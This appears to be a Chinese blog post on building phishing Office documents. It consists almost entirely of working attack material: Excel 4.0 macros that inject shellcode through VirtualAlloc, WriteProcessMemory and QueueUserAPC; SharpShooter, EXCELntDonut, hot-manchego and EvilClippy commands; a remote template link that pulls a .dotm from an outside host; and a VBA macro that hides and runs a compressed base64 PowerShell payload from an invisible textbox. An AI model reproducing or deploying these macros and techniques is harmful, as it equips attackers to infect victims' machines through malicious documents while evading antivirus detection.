原创 | 再聊钓鱼文档

Invoke-Excel4DCOM -ComputerName server01 -Payload C:temppayload.bin

SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee

REGISTER(module_name, procedure_name, type, alias, argument, macro_type, category)

=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)=Valloc(0,65536,4096,64)=SELECT(B1:B999,B1)=SET.VALUE(D1,0)=WHILE(ACTIVE.CELL()<>"excel")=SET.VALUE(D2,LEN(ACTIVE.CELL()))=WProcessMemory(-1,A10+(D1*255),ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)=SET.VALUE(D1,D1+1)=SELECT(,"R[1]C")=NEXT()=CThread(0,0,A10,0,0,0)=HALT()

=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)=WHILE(A22=0)=SET.VALUE(A22,Valloc(A21,65536,12288,64))=SET.VALUE(A21,A21+262144)=NEXT()=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)=SELECT(C1:C3479,C1)=SET.VALUE(D1,0)=WHILE(ACTIVE.CELL()<>"EXCEL")=SET.VALUE(D2,LEN(ACTIVE.CELL()))=RTL(A22+(D1*10),ACTIVE.CELL(),LEN(ACTIVE.CELL()))=SET.VALUE(D1,D1+1)=SELECT(,"R[1]C")=NEXT()=Queue(A22,-2,0)=Go()=SET.VALUE(A22,0)=HALT()

EXCELntDonut -f exe_source.cs -r System.Windows.Forms.dll

EPPLUS是一个用来生成Excel的.net库。https://github.com/EPPlusSoftware/EPPlus

C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /reference:EPPlus.dll hot-manchego.cshot-manchego.exe blank.xlsm vba.txt

<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://192.168.1.106/1.dotm" TargetMode="External"/>

Sub Main()On Error Resume NextcreateTextBoxsExecuteTextBoxCommandsEnd SubSub createTextBoxs()On Error Resume NextDim objTextBox As ShapeDim secretkey As LongDim str As StringDim zHf As StringDim payload As Stringpayload = "H4sIAAAAAAAAAK1WaW/iShb9nPwKf4gEKCQBs4U3ivQAYzDGxmA2kxdFZbuAMuWtvGDzpv/7lA2k09PpmZZmkJCr7LucOnepq8Lw"payload = payload + "QQ0JMkLJNSHzsIQkQK7DsLe328gxwmydLd53MHz3iGu8A9MkMAiYv29vFECAzRTvYkDebdeMMCwz+SYThGZEYOnm5vYmfxU5AdjC"payload = payload + "dweEKIbvNgz3rhkwL0zxteN5nGsD5Lz98UcvIgQ64Xn/OIBhJwigrWMEg2KJ+Sez2kMCHya6BY2Q+Zu5e38cYFcH+CKW9oCxp6fo"payload = payload + "OGb2bewaIDvBo+phFBYLf/1VKL0+VN8e+34EcFAsqGkQQvvRxLhQYr6VMofz1IPFgoQM4gbuNnxcIafGPi5y9HIOXjpjL5QuJ9t5"payload = payload + "gJ7j14fMrJ51igW6VCg3nTOHhTLzmvl7fXtj/vxAM4ucENnwUXBCSFxPhSRGBgweh8AxMZzBLVUrBDRmzq5QoiAIDCPiMFcsVC92"payload = payload + "D7B450QYl6nd19+1+1aU4fFK7u8qFT8rUSklJKXyJSd+hw4pz5uzOXqcn9B/Sq4S/f2UYKXbb1+lqgkx3IEQvoeU30+5entz85ov"payload = payload + "IT1PUXEDlOu9MJUyI1EQIHRJmoVzTiJYevsen7Pbq2ZQ/qWh6lXronMOzxnHC/O6dJH5dntTur1kT/b+XY8QNiHJvv+6Gji4RQ7k"payload = payload + "UgfYyLgmfPGrmMEthjkfj1cxmeIsFi4foMld2ClkhL7+rNa3Ufih2z2D6xg07gFFRVOi9COYcwyLBcGRoE35O+9pmt5taZnBq/Sl"payload = payload + "tNKr92yf5XIPgyAoM0pE69woMyoEGJplpuME6PKpE4Vuvix8hytFOEQGCMKrubfSF5ReXPdch1ZMZNDoUhrmqgcNBHDGSpkZIhN2"payload = payload + "UxXtrhAKX3LSAxjTkqOWYhoT+ibjQg2znCFm+d/zo/SowlCwPQxtKp13IR6DHe05l4rK0w3soFn4D7CvdXIuioyrK0mfQNMEULEb"payload = payload + "lpklIiHta4XyT4n3v8H7scX8ALNH4CWQxbwQhS1t6OcuQNkJ0Ik2Y+gzz6WsBF+7aZjVUm7GyK6blw+ic1pJSJV44tpdEMBmXc17"payload = payload + "XLFQY6Nd0lbGzVSyBHaUao6cGM6S9GN+AJr7ZMpGrjEPiT/sc3Q/M9ggwAPs6fuxD5KxZSXt3jrtKx12jJqogYRo3D05PDJsqjed"payload = payload + "uNqsTYRY5l0ctMQev1oAZPm5r8iuV80+SMcno7knExa62lH2hVjpmKvYaNqiyzdDqruM+pFH+tFE0aKxP7YFVN/H3DIcxcLgeSiy"payload = payload + "GnjGegvm+qaf+dL8XQyy/amd7ZHfgyTzo1H2Ya3ahKtRS3M8BFfR7nSUkWGeOMiO6PvIlQwvqMknY3s4WMCrLtRDVZwvNmvKTRX4"payload = payload + "hNebRNU8HC87i0NN2ZAcW8xTjHKGExns6KR5h4259Ps1RRcWQ0z8aITsp2kqpBcZe5Sqapc+xY0p+s8N88SmQ68OmgRRThPqp5Xx"payload = payload + "aywCS1hNHGPNI9vYs9zMMtp25Dco7vpQHonrhPjhiPgx9hsTxchw53qZ/LSOJ1Uq7+vWWAT3ApIs0D4FYxHG2TpVODFJBUt4jrqZ"payload = payload + "HjdIsL48WF61Dpsjh8XTNteWoCfaUjxTm7Mu6K6T+27aHyxUMx0kHW4trp86+nbnBq2DI3X1eijMOi2LsLzJpz01RYcnvD7E7Hij"payload = payload + "zPGgsmhMogrkYCqzi/5mxtmj/uxQXQ+mcjTnsTivtHtcV5P7R2k87SeTRWW0Vg+8MtvvON3p+pudBLiZpHVqMxoPU1ryHU5fGxw/"payload = payload + "raiDjlxbLLxhZu9sw41EVe6tZ5u+IE3WvV2j20Lb0xPeWa1D41CVN+0F2R21mWDp3hYE7BE1gHrfirzOXN427bm7ZTdNQYOVJQSg"payload = payload + "eqqAlup3dhOzJ676+/V4IdaaRnP69BwYadVSWEGdP8faUF7K4ux5GRw30ugETZ+7r7DcWtr5glLbhEHYqlYPykwTLHmkVO6TrZxU"payload = payload + "HWEyu190h9I8iWuidtQAqVQr3LY+8AbcsO1BzK0XVb/fdNd7rr6vI3u8DFvjCm0fdrNXc+yFtnna1FyV666D8XxUG+0loOimtrfm"payload = payload + "aNDg96fB0FdOvUa9Fh/1+kpqrCSho1U7w+kgGdvyuj4YidOBYGlebY5dvnrOaX9Dc5XWqKgLp6xWRaDlNStuYN08JuGJBa3u0RhE"payload = payload + "fkL/FZqT9ysqe8xkfJ+leS3pK/9I8xo0OafT1K1lY8n7vRkRoh6te70Ca2ELpJolULvGPTeO5ZZR6wqgT+PJzwK5v6uo/WRhGcg3"payload = payload + "5ruXl7xVbl1Cp58kmyj+wdDnAw6Zj4ZH2xxtr9n7+/u8Jd58fHq9S96uY+TH/kFPqLla4/bm23VeiMGnrvmr6UwCJNgDTLspnbCu"payload = payload + "9yPvEv4yJykuyjSKxa9H+wMkDsR07KWD8fVW6WDsGtlk94sR68+Pvk9vzwVd1tgvV6XvF0SpdL369Gi7zcefyxGvU+D3q2RDz1f+"payload = payload + "ROQYOrtwX2YqSa1SqWTPeoVa+31ieq6XFj/slbP57xOUz65w7upjYCORY8P/Ywx+8Prf2c34y2fI7+zliL6mLLuU/wU5qB694w0A"payload = payload + "AA=="zHf = " -NoP -NonI  -Command ""Invoke-"zHf = zHf + "Expression $(New-Object IO.StreamReader ($(New-O"zHf = zHf + "bject IO.Compression.DeflateStream ($(New-Object"zHf = zHf + " IO.MemoryStream (,$([Convert]::FromBase64String"zHf = zHf + "("" " & payload & " "" )))), [IO.Compression.Compr"zHf = zHf + "essionMode]::Decompress)), [Text.Encoding]::ASCI"zHf = zHf + "I)).ReadToEnd();Read-Host;"""secretkey = RGB(1, 33, 7)Debug.Print "Adding Embedded Command Shape Into Document"Set objTextBox = ActiveDocument.Shapes.AddTextbox(msoTextOrientationHorizontal, 0, 0, 0, 0)With objTextBox   .TextFrame.TextRange.Text = "powershell.exe|" + zHf + "|open|1"    .Name = "Shell.Application"    .Height = 1    .Width = 1    .Visible = msoFalse    .Shadow.Visible = True    .Shadow.ForeColor.RGB = secretkey    If .Shadow.ForeColor.RGB <> secretkey Then        Debug.Print "Fail to set secret key"    End If    Debug.Print "Secret Key For Command Shape: " & CStr(.Shadow.ForeColor.RGB)    .AlternativeText = "ShellExecute"   .TextFrame.TextRange.Font.TextColor.RGB = ActiveDocument.Background.Fill.BackColorEnd WithEnd SubSub ExecuteTextBoxCommands()On Error Resume NextDim objCmdShape As ShapeDim secretkey As LongDim cmdParams() As StringDim cmdCommand As StringDim cmdType As StringDim cmdObj As Objectsecretkey = RGB(1, 33, 7)For x = 1 To ActiveDocument.Shapes.Count    Set objCmdShape = ActiveDocument.Shapes(x)    If objCmdShape.Shadow.ForeColor.RGB = secretkey Then        Debug.Print "Discovered Command Text Object"        cmdType = objCmdShape.Name        cmdCommand = objCmdShape.AlternativeText        cmdParams = Split(objCmdShape.TextFrame.TextRange.Text, "|")        Debug.Print "Command Type To Execute: " & cmdType        Debug.Print "Command To Execute: " & cmdCommand        Debug.Print "Command Params to Execute: " & Join(cmdParams, " & ")        Set cmdObj = Interaction.CreateObject(cmdType)        VBA$.[Interaction].CallByName! cmdObj, [cmdCommand], VbMethod, cmdParams(0), cmdParams(1), cmdParams(2)        objCmdShape.Delete        ActiveDocument.Save        Exit For   End IfNextEnd Sub

csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs

EvilClippy.exe -s fakecode.vba -t 2016x86 macrofile.doc